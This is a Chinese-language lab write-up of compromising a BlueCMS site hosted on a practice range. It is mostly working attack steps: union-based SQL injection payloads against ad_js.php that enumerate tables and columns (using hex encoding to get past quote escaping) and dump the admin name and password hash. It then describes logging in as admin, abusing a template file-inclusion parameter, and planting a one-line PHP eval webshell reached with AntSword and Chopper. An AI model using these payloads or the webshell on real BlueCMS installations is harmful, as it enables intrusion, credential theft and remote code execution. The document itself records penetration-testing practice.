靶場地址
http://59.63.200.79:8003/bluecms/uploads/
百度查詢了bluecms的相關漏洞
發現存在sql注入,且sql注入點在如下網頁
http://59.63.200.79:8003/bluecms/uploads/ad_js.php?ad_id=1
經過探測,發現字段數是7個
http://59.63.200.79:8003/bluecms/uploads/ad_js.php?ad_id=1%20union%20select%201,2,3,4,5,6,database()
發現是可以爆出數據庫相關信息的
爆表名
?ad_id=1%20union select 1,2,3,4,5,6,(select group_concat(table_name) from information_schema.tables where table_schema=database())--+
document.write("blue_ad,blue_ad_phone,blue_admin,blue_admin_log,blue_ann,blue_ann_cat,blue_arc_cat,blue_area,blue_article,blue_attachment,blue_buy_record,blue_card_order,blue_card_type,blue_category,blue_comment,blue_config,blue_flash_image,blue_guest_book,blue_ipbanned,blue_link,blue_model,blue_navigate,blue_pay,blue_post,blue_post_att,blue_post_pic,blue_service,blue_task,blue_user");
根據上面爆出來的數據,我發現有兩個敏感的表名,blue_admin,blue_admin_log
爆字段
但是我這里遇到了問題
?ad_id=1%20union select 1,2,3,4,5,6,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='blue_admin')--+
初步判斷是因為轉義的原因,看到 \ 反斜杠,突然感覺有點像寬字節注入。
但錯誤並沒有解決,我去掉單引號后,識別出來的是這樣的
table_name=遙lue_admin�
這導致sql語句不正常。
我想到用編碼的方式試一下。
?ad_id=1%20union select 1,2,3,4,5,6,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=0x626c75655f61646d696e)--+
document.write("admin_id,admin_name,email,pwd,purview,add_time,last_login_time,last_login_ip");
頁面無報錯,爆出字段
爆數據
?ad_id=1%20union select 1,2,3,4,5,6,(select group_concat(admin_name,0x7e,pwd,0x7e) from blue_admin)--+
document.write("admin~21232f297a57a5a743894a0e4a801fc3~");
掃描后台
登錄
http://59.63.200.79:8003/bluecms/uploads/admin
登錄之后,點點點---->發現
可能存在上傳漏洞
看到這里,是不是有小伙伴想到了上傳文件獲取shell。
我試了,但是沒有成功。
但你們可以試一試。
又繼續東點點、西點點
又有新發現
文件包含漏洞
不同瀏覽器F12顯示的位置不一樣---------上圖是火狐瀏覽器,下圖為谷歌瀏覽器。
利用步驟
右鍵---->編輯
打開一個新標簽
復制剛剛的網址把 tpl_name 參數進行修改為你想要修改的php文件
這個php文件來源我在下面進行講解
php文件來源講解
修改php代碼,加入一句話木馬
@eval($_REQUEST['cmd']);
獲得getshell
使用蟻劍連接,連接失敗,我有點慌了,我又打開了菜刀。連接上了,獲得了getshell
